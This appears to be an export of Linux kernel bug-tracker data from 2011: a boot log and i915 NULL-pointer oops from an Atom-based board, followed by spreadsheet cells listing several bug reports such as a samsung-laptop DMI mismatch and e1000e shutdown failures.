pid_max: default: 32768 minimum: 301 [ 0.004156] Mount-cache hash table entries: 512 [ 0.004345] Atom PSE erratum detected, BIOS microcode update recommended [ 0.004365] mce: CPU supports 5 MCE banks [ 0.004381] using mwait in idle threads. [ 0.004397] CPU: Intel(R) Atom(TM) CPU N270 @ 1.60GHz stepping 02 [ 0.005080] Performance Events: PEBS fmt0+, Atom events, Intel PMU driver. [ 0.005114] ... version: 3 [ 0.005124] ... bit width: 40 [ 0.005134] ... generic registers: 2 [ 0.005144] ... value mask: 000000ffffffffff [ 0.005156] ... max period: 000000007fffffff [ 0.005167] ... fixed-purpose events: 3 [ 0.005177] ... event mask: 0000000700000003 [ 0.005314] Enabling APIC mode: Flat. Using 1 I/O APICs [ 0.005406] ExtINT not setup in hardware but reported by MP table [ 0.005716] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0 [ 0.152643] NET: Registered protocol family 16 [ 0.153519] PCI: Using configuration type 1 for base access [ 0.162928] bio: create slab &lt;bio-0&gt; at 0 [ 0.163299] vgaarb: loaded [ 0.163692] SCSI subsystem initialized [ 0.164133] usbcore: registered new interface driver usbfs [ 0.164235] usbcore: registered new interface driver hub [ 0.164353] usbcore: registered new device driver usb [ 0.164604] PCI: Probing PCI hardware [ 0.164619] PCI: Probing PCI hardware (bus 00) [ 0.164741] pci 0000:00:00.0: [8086:27ac] type 0 class 0x000600 [ 0.164802] pci 0000:00:02.0: [8086:27ae] type 0 class 0x000300 [ 0.164823] pci 0000:00:02.0: reg 10: [mem 0xfe980000-0xfe9fffff] [ 0.164835] pci 0000:00:02.0: reg 14: [io 0xcc80-0xcc87] [ 0.164847] pci 0000:00:02.0: reg 18: [mem 0xd0000000-0xdfffffff pref] [ 0.164859] pci 0000:00:02.0: reg 1c: [mem 0xfe940000-0xfe97ffff] [ 0.164913] pci 0000:00:02.1: [8086:27a6] type 0 class 0x000380 [ 0.164929] pci 0000:00:02.1: reg 10: [mem 0xfe880000-0xfe8fffff] [ 0.165038] pci 0000:00:1c.0: [8086:27d0] type 1 class 0x000604 [ 0.165125] pci 0000:00:1c.0: PME# supported from D0 D3hot D3cold [ 0.165134] pci 0000:00:1c.0: PME# disabled [ 0.165168] pci 0000:00:1c.1: [8086:27d2] type 1 class 0x000604 [ 0.165254] pci 0000:00:1c.1: PME# supported from D0 D3hot D3cold [ 0.165263] pci 0000:00:1c.1: PME# disabled [ 0.165302] pci 0000:00:1d.0: [8086:27c8] type 0 class 0x000c03 [ 0.165363] pci 0000:00:1d.0: reg 20: [io 0xcc00-0xcc1f] [ 0.165414] pci 0000:00:1d.1: [8086:27c9] type 0 class 0x000c03 [ 0.165475] pci 0000:00:1d.1: reg 20: [io 0xc880-0xc89f] [ 0.165524] pci 0000:00:1d.2: [8086:27ca] type 0 class 0x000c03 [ 0.165586] pci 0000:00:1d.2: reg 20: [io 0xc800-0xc81f] [ 0.165634] pci 0000:00:1d.3: [8086:27cb] type 0 class 0x000c03 [ 0.165695] pci 0000:00:1d.3: reg 20: [io 0xc480-0xc49f] [ 0.165756] pci 0000:00:1d.7: [8086:27cc] type 0 class 0x000c03 [ 0.165787] pci 0000:00:1d.7: reg 10: [mem 0xfe93bc00-0xfe93bfff] [ 0.165887] pci 0000:00:1d.7: PME# supported from D0 D3hot D3cold [ 0.165896] pci 0000:00:1d.7: PME# disabled [ 0.165928] pci 0000:00:1e.0: [8086:2448] type 1 class 0x000604 [ 0.166018] pci 0000:00:1f.0: [8086:27b9] type 0 class 0x000601 [ 0.166144] pci 0000:00:1f.0: Force enabled HPET at 0xfed00000 [ 0.166162] pci 0000:00:1f.0: ICH7 LPC Generic IO decode 1 PIO at 0a00 (mask 003f) [ 0.166183] pci 0000:00:1f.0: ICH7 LPC Generic IO decode 2 PIO at 02e0 (mask 003f) [ 0.166247] pci 0000:00:1f.1: [8086:27df] type 0 class 0x000101 [ 0.166269] pci 0000:00:1f.1: reg 10: [io 0x0000-0x0007] [ 0.166286] pci 0000:00:1f.1: reg 14: [io 0x0000-0x0003] [ 0.166302] pci 0000:00:1f.1: reg 18: [io 0x08f0-0x08f7] [ 0.166319] pci 0000:00:1f.1: reg 1c: [io 0x08f8-0x08fb] [ 0.166336] pci 0000:00:1f.1: reg 20: [io 0xffa0-0xffaf] [ 0.166390] pci 0000:00:1f.2: [8086:27c4] type 0 class 0x000101 [ 0.166415] pci 0000:00:1f.2: reg 10: [io 0xc400-0xc407] [ 0.166431] pci 0000:00:1f.2: reg 14: [io 0xc080-0xc083] [ 0.166446] pci 0000:00:1f.2: reg 18: [io 0xc000-0xc007] [ 0.166462] pci 0000:00:1f.2: reg 1c: [io 0xbc80-0xbc83] [ 0.166477] pci 0000:00:1f.2: reg 20: [io 0xbc00-0xbc0f] [ 0.166493] pci 0000:00:1f.2: reg 24: [mem 0xfe93b800-0xfe93bbff] [ 0.166531] pci 0000:00:1f.2: PME# supported from D3hot [ 0.166539] pci 0000:00:1f.2: PME# disabled [ 0.166565] pci 0000:00:1f.3: [8086:27da] type 0 class 0x000c05 [ 0.166638] pci 0000:00:1f.3: reg 20: [io 0x0400-0x041f] [ 0.166771] pci 0000:01:00.0: [10ec:8168] type 0 class 0x000200 [ 0.166796] pci 0000:01:00.0: reg 10: [io 0xdc00-0xdcff] [ 0.166837] pci 0000:01:00.0: reg 18: [mem 0xfeaff000-0xfeafffff 64bit] [ 0.166865] pci 0000:01:00.0: reg 20: [mem 0xfdef0000-0xfdefffff 64bit pref] [ 0.166886] pci 0000:01:00.0: reg 30: [mem 0xfeac0000-0xfeadffff pref] [ 0.166942] pci 0000:01:00.0: supports D1 D2 [ 0.166948] pci 0000:01:00.0: PME# supported from D0 D1 D2 D3hot D3cold [ 0.166957] pci 0000:01:00.0: PME# disabled [ 0.166986] pci 0000:00:1c.0: PCI bridge to [bus 01-01] [ 0.167004] pci 0000:00:1c.0: bridge window [io 0xd000-0xdfff] [ 0.167014] pci 0000:00:1c.0: bridge window [mem 0xfea00000-0xfeafffff] [ 0.167027] pci 0000:00:1c.0: bridge window [mem 0xfde00000-0xfdefffff 64bit pref] [ 0.167118] pci 0000:02:00.0: [10ec:8168] type 0 class 0x000200 [ 0.167143] pci 0000:02:00.0: reg 10: [io 0xec00-0xecff] [ 0.167184] pci 0000:02:00.0: reg 18: [mem 0xfebff000-0xfebfffff 64bit] [ 0.167212] pci 0000:02:00.0: reg 20: [mem 0xfdff0000-0xfdffffff 64bit pref] [ 0.167233] pci 0000:02:00.0: reg 30: [mem 0xfebc0000-0xfebdffff pref] [ 0.167289] pci 0000:02:00.0: supports D1 D2 [ 0.167295] pci 0000:02:00.0: PME# supported from D0 D1 D2 D3hot D3cold [ 0.167304] pci 0000:02:00.0: PME# disabled [ 0.167333] pci 0000:00:1c.1: PCI bridge to [bus 02-02] [ 0.167350] pci 0000:00:1c.1: bridge window [io 0xe000-0xefff] [ 0.167359] pci 0000:00:1c.1: bridge window [mem 0xfeb00000-0xfebfffff] [ 0.167372] pci 0000:00:1c.1: bridge window [mem 0xfdf00000-0xfdffffff 64bit pref] [ 0.167442] pci 0000:03:05.0: [3388:0022] type 1 class 0x000604 [ 0.167544] pci 0000:03:05.0: supports D1 D2 [ 0.167589] pci 0000:03:0e.0: [1283:8888] type 0 class 0x000601 [ 0.167719] pci 0000:00:1e.0: PCI bridge to [bus 03-04] (subtractive decode) [ 0.167738] pci 0000:00:1e.0: bridge window [io 0xf000-0x0000] (disabled) [ 0.167747] pci 0000:00:1e.0: bridge window [mem 0xfff00000-0x000fffff] (disabled) [ 0.167760] pci 0000:00:1e.0: bridge window [mem 0xfff00000-0x000fffff pref] (disabled) [ 0.167768] pci 0000:00:1e.0: bridge window [io 0x0000-0xffff] (subtractive decode) [ 0.167776] pci 0000:00:1e.0: bridge window [mem 0x00000000-0xffffffff] (subtractive decode) [ 0.167918] pci 0000:03:05.0: PCI bridge to [bus 04-04] [ 0.167938] pci 0000:03:05.0: bridge window [io 0xf000-0x0000] (disabled) [ 0.167948] pci 0000:03:05.0: bridge window [mem 0xfff00000-0x000fffff] (disabled) [ 0.167961] pci 0000:03:05.0: bridge window [mem 0xfff00000-0x000fffff pref] (disabled) [ 0.168374] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none [ 0.170715] pci 0000:00:1f.0: PIIX/ICH IRQ router [8086:27b9] [ 0.170754] PCI: pci_cache_line_size set to 64 bytes [ 0.170874] reserve RAM buffer: 0000000000097000 - 000000000009ffff [ 0.170881] reserve RAM buffer: 000000001f7b0000 - 000000001fffffff [ 0.171345] hpet clockevent registered [ 0.171379] Switching to clocksource hpet [ 0.171994] Switched to NOHz mode on CPU #0 [ 0.175748] pci 0000:00:1c.0: PCI bridge to [bus 01-01] [ 0.175771] pci 0000:00:1c.0: bridge window [io 0xd000-0xdfff] [ 0.175790] pci 0000:00:1c.0: bridge window [mem 0xfea00000-0xfeafffff] [ 0.175808] pci 0000:00:1c.0: bridge window [mem 0xfde00000-0xfdefffff 64bit pref] [ 0.175832] pci 0000:00:1c.1: PCI bridge to [bus 02-02] [ 0.175847] pci 0000:00:1c.1: bridge window [io 0xe000-0xefff] [ 0.175865] pci 0000:00:1c.1: bridge window [mem 0xfeb00000-0xfebfffff] [ 0.175883] pci 0000:00:1c.1: bridge window [mem 0xfdf00000-0xfdffffff 64bit pref] [ 0.175908] pci 0000:03:05.0: PCI bridge to [bus 04-04] [ 0.175920] pci 0000:03:05.0: bridge window [io disabled] [ 0.175937] pci 0000:03:05.0: bridge window [mem disabled] [ 0.175953] pci 0000:03:05.0: bridge window [mem pref disabled] [ 0.175973] pci 0000:00:1e.0: PCI bridge to [bus 03-04] [ 0.175985] pci 0000:00:1e.0: bridge window [io disabled] [ 0.176035] pci 0000:00:1e.0: bridge window [mem disabled] [ 0.176051] pci 0000:00:1e.0: bridge window [mem pref disabled] [ 0.176092] pci 0000:00:1c.0: PCI-&gt;APIC IRQ transform: INT A -&gt; IRQ 16 [ 0.176111] pci 0000:00:1c.0: setting latency timer to 64 [ 0.176129] pci 0000:00:1c.1: PCI-&gt;APIC IRQ transform: INT B -&gt; IRQ 17 [ 0.176147] pci 0000:00:1c.1: setting latency timer to 64 [ 0.176161] pci 0000:00:1e.0: setting latency timer to 64 [ 0.176179] pci_bus 0000:00: resource 0 [io 0x0000-0xffff] [ 0.176186] pci_bus 0000:00: resource 1 [mem 0x00000000-0xffffffff] [ 0.176193] pci_bus 0000:01: resource 0 [io 0xd000-0xdfff] [ 0.176200] pci_bus 0000:01: resource 1 [mem 0xfea00000-0xfeafffff] [ 0.176207] pci_bus 0000:01: resource 2 [mem 0xfde00000-0xfdefffff 64bit pref] [ 0.176214] pci_bus 0000:02: resource 0 [io 0xe000-0xefff] [ 0.176221] pci_bus 0000:02: resource 1 [mem 0xfeb00000-0xfebfffff] [ 0.176228] pci_bus 0000:02: resource 2 [mem 0xfdf00000-0xfdffffff 64bit pref] [ 0.176236] pci_bus 0000:03: resource 4 [io 0x0000-0xffff] [ 0.176242] pci_bus 0000:03: resource 5 [mem 0x00000000-0xffffffff] [ 0.176340] NET: Registered protocol family 2 [ 0.176482] IP route cache hash table entries: 4096 (order: 2, 16384 bytes) [ 0.176894] TCP established hash table entries: 16384 (order: 5, 131072 bytes) [ 0.177031] TCP bind hash table entries: 16384 (order: 4, 65536 bytes) [ 0.177115] TCP: Hash tables configured (established 16384 bind 16384) [ 0.177129] TCP reno registered [ 0.177141] UDP hash table entries: 256 (order: 0, 4096 bytes) [ 0.177158] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes) [ 0.177329] NET: Registered protocol family 1 [ 0.177559] RPC: Registered udp transport module. [ 0.177574] RPC: Registered tcp transport module. [ 0.177585] RPC: Registered tcp NFSv4.1 backchannel transport module. [ 0.177617] pci 0000:00:02.0: Boot video device [ 0.204075] PCI: CLS 32 bytes, default 64 [ 0.204591] platform rtc_cmos: registered platform RTC device (no PNP device found) [ 0.206578] HugeTLB registered 4 MB page size, pre-allocated 0 pages [ 0.206916] squashfs: version 4.0 (2009/01/31) Phillip Lougher [ 0.207212] Installing knfsd (copyright (C) 1996 okir@monad.swb.de). [ 0.207462] msgmni has been set to 984 [ 0.207698] io scheduler noop registered [ 0.207712] io scheduler deadline registered [ 0.207757] io scheduler cfq registered (default) [ 0.208712] vesafb: framebuffer at 0xd0000000, mapped to 0xe0000000, using 1875k, total 7872k [ 0.208735] vesafb: mode is 800x600x16, linelength=1600, pages=7 [ 0.208747] vesafb: scrolling: redraw [ 0.208760] vesafb: Truecolor: size=0:5:6:5, shift=0:11:5:0 [ 0.208920] fbcon: VESA VGA (fb0) is primary device [ 0.218910] Console: switching to colour frame buffer device 100x37 [ 0.228729] fb0: VESA VGA frame buffer device [ 0.315336] Serial: 8250/16550 driver, 10 ports, IRQ sharing disabled [ 0.336203] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A [ 0.357179] serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A [ 0.359897] Real Time Clock Driver v1.12b [ 0.360285] Non-volatile memory driver v1.3 [ 0.360455] Linux agpgart interface v0.103 [ 0.360657] agpgart-intel 0000:00:00.0: Intel 945GME Chipset [ 0.361017] agpgart-intel 0000:00:00.0: detected gtt size: 262144K total, 262144K mappable [ 0.361413] agpgart-intel 0000:00:00.0: detected 8192K stolen memory [ 0.361968] agpgart-intel 0000:00:00.0: AGP aperture is 256M @ 0xd0000000 [ 0.362498] [drm] Initialized drm 1.1.0 20060810 [ 0.367492] pci 0000:00:02.0: PCI-&gt;APIC IRQ transform: INT A -&gt; IRQ 16 [ 0.372431] pci 0000:00:02.0: setting latency timer to 64 [ 0.415789] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010). [ 0.417587] [drm] No driver support for vblank timestamp query. [ 0.419527] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 0.425405] brd: module loaded [ 0.429340] loop: module loaded [ 0.431229] nbd: registered device at major 43 [ 0.437444] Uniform Multi-Platform E-IDE driver [ 0.439550] piix 0000:00:1f.1: IDE controller (0x8086:0x27df rev 0x02) [ 0.441517] pci 0000:00:1f.1: PCI-&gt;APIC IRQ transform: INT A -&gt; IRQ 18 [ 0.443308] piix 0000:00:1f.1: IDE port disabled [ 0.445114] piix 0000:00:1f.1: not 100% native mode: will probe irqs later [ 0.446887] ide0: BM-DMA at 0xffa0-0xffa7 [ 0.448662] Probing IDE interface ide0... [ 1.016024] hdb: TS2GCF133, CFA DISK drive [ 1.017885] hdb: host max PIO4 wanted PIO255(auto-tune) selected PIO4 [ 1.018274] hdb: host side 80-wire cable detection failed, limiting max speed to UDMA33 [ 1.020106] hdb: UDMA/33 mode selected [ 1.022317] ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 [ 1.024665] ide_generic: please use "probe_mask=0x3f" module parameter for probing all legacy ISA IDE ports [ 1.028416] ide-gd driver 1.18 [ 1.030278] hdb: max request size: 128KiB [ 1.032137] hdb: 3915072 sectors (2004 MB) w/1KiB Cache, CHS=3884/16/63 [ 1.040857] hdb: hdb1 hdb2 [ 1.043363] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI [ 1.045292] e1000: Copyright (c) 1999-2006 Intel Corporation. [ 1.047382] e100: Intel(R) PRO/100 Network Driver, 3.5.24-k2-NAPI [ 1.049302] e100: Copyright(c) 1999-2006 Intel Corporation [ 1.051379] PPP generic driver version 2.4.2 [ 1.053639] PPP Deflate Compression module registered [ 1.055518] PPP BSD Compression module registered [ 1.057582] r8169 Gigabit Ethernet driver 2.3LK-NAPI loaded [ 1.059519] r8169 0000:01:00.0: PCI-&gt;APIC IRQ transform: INT A -&gt; IRQ 16 [ 1.061529] r8169 0000:01:00.0: setting latency timer to 64 [ 1.061547] r8169 0000:01:00.0: no MSI. Back to INTx. [ 1.063927] r8169 0000:01:00.0: eth0: RTL8168cp/8111cp at 0xdffba000, 00:18:7d:15:07:03, XID 1cb00080 IRQ 16 [ 1.067866] r8169 Gigabit Ethernet driver 2.3LK-NAPI loaded [ 1.069880] r8169 0000:02:00.0: PCI-&gt;APIC IRQ transform: INT A -&gt; IRQ 17 [ 1.071895] r8169 0000:02:00.0: setting latency timer to 64 [ 1.071912] r8169 0000:02:00.0: no MSI. Back to INTx. [ 1.074373] r8169 0000:02:00.0: eth1: RTL8168cp/8111cp at 0xdffda000, 00:18:7d:15:07:04, XID 1cb00080 IRQ 17 [ 1.078425] netconsole: local port 5555 [ 1.080391] netconsole: local IP 192.168.72.123 [ 1.082337] netconsole: interface 'eth0' [ 1.084294] netconsole: remote port 5556 [ 1.086204] netconsole: remote IP 192.168.72.255 [ 1.088101] netconsole: remote ethernet address ff:ff:ff:ff:ff:ff [ 1.089976] netconsole: device eth0 not up yet, forcing it [ 1.094927] r8169 0000:01:00.0: eth0: link down [ 1.096790] r8169 0000:01:00.0: eth0: link down [ 1.204026] Refined TSC clocksource calibration: 1595.999 MHz. [ 1.205840] Switching to clocksource tsc [ 3.539171] r8169 0000:01:00.0: eth0: link up [ 3.884821] console [netcon0] enabled [ 3.886567] netconsole: network logging started [ 3.888317] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver [ 3.890075] ehci_hcd 0000:00:1d.7: PCI-&gt;APIC IRQ transform: INT A -&gt; IRQ 23 [ 3.891828] ehci_hcd 0000:00:1d.7: setting latency timer to 64 [ 3.891837] ehci_hcd 0000:00:1d.7: EHCI Host Controller [ 3.893585] ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 1 [ 3.895370] ehci_hcd 0000:00:1d.7: using broken periodic workaround [ 3.897107] ehci_hcd 0000:00:1d.7: debug port 1 [ 3.902667] ehci_hcd 0000:00:1d.7: cache line size of 32 is not supported [ 3.902686] ehci_hcd 0000:00:1d.7: irq 23, io mem 0xfe93bc00 [ 3.920022] ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00 [ 3.922218] hub 1-0:1.0: USB hub found [ 3.923874] hub 1-0:1.0: 8 ports detected [ 3.925702] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver [ 3.927451] uhci_hcd: USB Universal Host Controller Interface driver [ 3.929187] uhci_hcd 0000:00:1d.0: PCI-&gt;APIC IRQ transform: INT A -&gt; IRQ 23 [ 3.930867] uhci_hcd 0000:00:1d.0: setting latency timer to 64 [ 3.930876] uhci_hcd 0000:00:1d.0: UHCI Host Controller [ 3.932570] uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 2 [ 3.934266] uhci_hcd 0000:00:1d.0: irq 23, io base 0x0000cc00 [ 3.936439] hub 2-0:1.0: USB hub found [ 3.938049] hub 2-0:1.0: 2 ports detected [ 3.939702] uhci_hcd 0000:00:1d.1: PCI-&gt;APIC IRQ transform: INT B -&gt; IRQ 19 [ 3.941351] uhci_hcd 0000:00:1d.1: setting latency timer to 64 [ 3.941360] uhci_hcd 0000:00:1d.1: UHCI Host Controller [ 3.942945] uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 3 [ 3.944581] uhci_hcd 0000:00:1d.1: irq 19, io base 0x0000c880 [ 3.946624] hub 3-0:1.0: USB hub found [ 3.948195] hub 3-0:1.0: 2 ports detected [ 3.949813] uhci_hcd 0000:00:1d.2: PCI-&gt;APIC IRQ transform: INT C -&gt; IRQ 18 [ 3.951412] uhci_hcd 0000:00:1d.2: setting latency timer to 64 [ 3.951421] uhci_hcd 0000:00:1d.2: UHCI Host Controller [ 3.953061] uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 4 [ 3.954740] uhci_hcd 0000:00:1d.2: irq 18, io base 0x0000c800 [ 3.956908] hub 4-0:1.0: USB hub found [ 3.958565] hub 4-0:1.0: 2 ports detected [ 3.960307] uhci_hcd 0000:00:1d.3: PCI-&gt;APIC IRQ transform: INT D -&gt; IRQ 16 [ 3.962003] uhci_hcd 0000:00:1d.3: setting latency timer to 64 [ 3.962012] uhci_hcd 0000:00:1d.3: UHCI Host Controller [ 3.963684] uhci_hcd 0000:00:1d.3: new USB bus registered, assigned bus number 5 [ 3.965425] uhci_hcd 0000:00:1d.3: irq 16, io base 0x0000c480 [ 3.967621] hub 5-0:1.0: USB hub found [ 3.969347] hub 5-0:1.0: 2 ports detected [ 3.971187] Initializing USB Mass Storage driver... [ 3.973018] usbcore: registered new interface driver usb-storage [ 3.974677] USB Mass Storage support registered. [ 3.976557] usbcore: registered new interface driver usbserial [ 3.978226] usbserial: USB Serial Driver core [ 3.980416] serio: i8042 KBD port at 0x60,0x64 irq 1 [ 3.982181] serio: i8042 AUX port at 0x60,0x64 irq 12 [ 3.984597] mousedev: PS/2 mouse device common for all mice [ 3.986752] input: PC Speaker as /devices/platform/pcspkr/input/input0 [ 3.988739] lirc_dev: IR Remote Control driver registered, major 254 [ 3.993048] usbcore: registered new interface driver usbhid [ 3.994775] usbhid: USB HID core driver [ 3.997175] TCP cubic registered [ 3.998846] NET: Registered protocol family 17 [ 4.000607] 802.1Q VLAN Support v1.8 Ben Greear &lt;greearb@candelatech.com&gt; [ 4.002317] All bugs added by David S. Miller &lt;davem@redhat.com&gt; [ 4.004098] Using IPI Shortcut mode [ 4.083598] EXT3-fs: barriers not enabled [ 4.086056] EXT3-fs (hdb1): mounted filesystem with writeback data mode [ 4.087802] VFS: Mounted root (ext3 filesystem) readonly on device 3:65. [ 4.089553] kjournald starting. Commit interval 5 seconds [ 4.091320] Freeing unused kernel memory: 324k freed [ 4.476078] usb 4-1: new low speed USB device using uhci_hcd and address 2 [ 4.675868] input: MosArt Optical Mouse as /devices/pci0000:00/0000:00:1d.2/usb4/4-1/4-1:1.0/input/input1 [ 4.680570] generic-usb 0003:062A:0003.0001: input: USB HID v1.10 Mouse [MosArt Optical Mouse] on usb-0000:00:1d.2-1/input0 [ 4.924051] usb 4-2: new low speed USB device using uhci_hcd and address 3 [ 5.121648] input: CHICONY USB Keyboard as /devices/pci0000:00/0000:00:1d.2/usb4/4-2/4-2:1.0/input/input2 [ 5.125991] generic-usb 0003:04F2:0116.0002: input: USB HID v1.10 Keyboard [CHICONY USB Keyboard] on usb-0000:00:1d.2-2/input0 [ 5.475114] udevd (1187): /proc/1187/oom_adj is deprecated, please use /proc/1187/oom_score_adj instead. [ 8.034061] EXT3-fs: barriers not enabled [ 8.039110] kjournald starting. Commit interval 5 seconds [ 8.042406] EXT3-fs (hdb2): using internal journal [ 8.044664] EXT3-fs (hdb2): recovery complete [ 8.046883] EXT3-fs (hdb2): mounted filesystem with ordered data mode [ 8.873029] r8169 0000:02:00.0: eth1: link down # then X is started, and the rest is captured through netconsole [ 213.443542] BUG: unable to handle kernel NULL pointer dereference at 00000084 [ 213.443566] IP: [&lt;c11f7e0f&gt;] i915_driver_irq_handler+0x11f/0xa90 [ 213.443587] *pde = 00000000 [ 213.443597] Oops: 0000 [#1] PREEMPT [ 213.443608] last sysfs file: /sys/devices/virtual/dmi/id/board_asset_tag [ 213.443617] Modules linked in: [ 213.443626] [ 213.443634] Pid: 2511, comm: ecu-ns-proxy Not tainted 2.6.38.7--NAVY #25 ICP / iEi PCISA-945GSE / PCISA-945GSE(B125) [ 213.443657] EIP: 0060:[&lt;c11f7e0f&gt;] EFLAGS: 00210082 CPU: 0 [ 213.443666] EIP is at i915_driver_irq_handler+0x11f/0xa90 [ 213.443674] EAX: 00000000 EBX: 00000000 ECX: 00000000 EDX: dffee898 [ 213.443682] ESI: 00000000 EDI: deffc000 EBP: dec09fc0 ESP: dec09f3c [ 213.443690] DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 [ 213.443698] Process ecu-ns-proxy (pid: 2511, ti=dec08000 task=dec894e0 task.ti=dc592000) [ 213.443705] Stack: [ 213.443711] 00000002 c140f68a c1398264 c1410474 de458400 dec09f64 c12348af 00011000 [ 213.443750] de45c400 de458400 dec09f90 c123dc18 dec09f84 de4585bc deffc2b8 deffc01c ---- 8&lt; ---- ---- 8&lt; ---- (X -verbose) navy3:~# X -verbose _XSERVTransSocketOpenCOTSServer: Unable to open socket for inet6 _XSERVTransOpen: transport open failed for inet6/navy3:0 _XSERVTransMakeAllCOTSServerListeners: failed to open listener for inet6 X.Org X Server 1.4.2 Release Date: 11 June 2008 X Protocol Version 11, Revision 0 Build Operating System: Linux Debian (xorg-server 2:1.4.2-10.lenny3) Current Operating System: Linux navy3 2.6.38.7--NAVY #25 PREEMPT Sat May 28 13:39:47 MSD 2011 i686 Build Date: 25 September 2010 12:05:44PM Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. Module Loader present Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (==) Log file: "/var/log/Xorg.0.log", Time: Sat May 28 18:26:50 2011 (==) Using config file: "/etc/X11/xorg.conf" (==) ServerLayout "Default Layout" (**) |--&gt;Screen "Default Screen" (0) (**) | |--&gt;Monitor "LCD 1600x1200" (==) No device specified for screen "Default Screen". Using the first device section listed. (**) | |--&gt;Device "Default card" (**) |--&gt;Input Device "Generic Keyboard" (**) |--&gt;Input Device "Configured Mouse" (==) Automatically adding devices (==) Automatically enabling devices (==) No FontPath specified. Using compiled-in default. (WW) The</t>
  </si>
  <si>
    <t>samsung-laptop: N150 DMI mismatch</t>
  </si>
  <si>
    <t>2011-05-28 11:10 UTC</t>
  </si>
  <si>
    <t>Daniel Eklöf</t>
  </si>
  <si>
    <t>2011-08-08 17:28 UTC</t>
  </si>
  <si>
    <t>The samsung-laptop driver fails to load on my laptop (N150), due to a DMI mismatch: the driver expexts N230 to be in the identifier (and product/board name), whereas my laptop only includes N150/N210/N220. Full DMI output is attached.</t>
  </si>
  <si>
    <t>Filesystem lockup on USB HDD plug-in</t>
  </si>
  <si>
    <t>2.6.38.6, 2.5.38.7, 2.6.39.1</t>
  </si>
  <si>
    <t>2011-05-28 12:34 UTC</t>
  </si>
  <si>
    <t>2011-07-10 10:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 59762 [details] Crash log Hi, I recently upgraded to kernel 2.6.39 and today found that on plug-in of a specific WD USB HDD, I get a hard filesystem lockup. Manual regression showed the problem back to 2.6.38.6 , but not in 2.6.38.5 or .4. This does not happen with two other (a bit older) WD USB HDDs. Attached are - Crash log captured from serial console - lspci - lsusb - kernel .config file If you need anything else, please let me know. Gr"usse, Arno</t>
  </si>
  <si>
    <t>e1000e runtime suspend breaks shutdown - ThinkPad T510, X60, X61s, X201</t>
  </si>
  <si>
    <t>kernel26-2.6.38.7x86_64 =&gt; linux3.0.4-1x86_64</t>
  </si>
  <si>
    <t>2011-05-28 22:29 UTC</t>
  </si>
  <si>
    <t>Mike Lenzen</t>
  </si>
  <si>
    <t>2013-03-01 16:09 UTC</t>
  </si>
  <si>
    <t>I have a lenovo x201 thinkpad laptop. After a reboot or halt, the computer does not power off. All other commands seem to be executed correctly, and partitions are unmounted. The only way to power down is to hold in the on/off switch. This problem is non existent in kernel version kernel26-2.6.37-5-x86_6. I'm running Arch Linux</t>
  </si>
  <si>
    <t>Erroneous package power limit notification since kernel 2.6.39</t>
  </si>
  <si>
    <t>Thermal</t>
  </si>
  <si>
    <t>3.3.4</t>
  </si>
  <si>
    <t>2011-05-29 19:52 UTC</t>
  </si>
  <si>
    <t>2014-03-07 16:56 UTC</t>
  </si>
  <si>
    <t>Fenghua Yu</t>
  </si>
  <si>
    <t>Subject : Erroneous package power limit notification since kernel 2.6.39 Submitter : Olaf Freyer &lt;aaron667@gmx.net&gt; Date : 2011-05-22 13:01 Message-ID : 4DD9092A.4080507@gmx.net References : http://marc.info/?l=linux-kernel&amp;m=130606930631131&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel panic when boot the 2.6.39+ kernel based off of 2.6.32 kernel</t>
  </si>
  <si>
    <t>2.6.39+</t>
  </si>
  <si>
    <t>2011-05-30 02:38 UTC</t>
  </si>
  <si>
    <t>qcui</t>
  </si>
  <si>
    <t>Created attachment 60012 [details] kernel panic console output When I updated the kernel from 2.6.32 to 2.6.39+ on a server with AMD Magny-Cours CPU, the server can not boot the 2.6.39+ kernel successfully. The console ouput showed 'Kernel panic - not syncing: Attempted to kill the idle task!' I have tried to set the kernel parameter idle=poll in the grub file. It still failed to reboot due to the same error. But it can reboot successfully on the server with Intel CPU. The full console output is attached. Steps to reproduce: 1. install the 2.6.32 kernel 2. compile and install the kernel 2.6.39+ 3. reboot</t>
  </si>
  <si>
    <t>kvm: 100% CPU usage after 3.0.0-rc1 guest shutdown</t>
  </si>
  <si>
    <t>3.0.0-rc1</t>
  </si>
  <si>
    <t>2011-05-30 08:40 UTC</t>
  </si>
  <si>
    <t>2012-06-13 15:07 UTC</t>
  </si>
  <si>
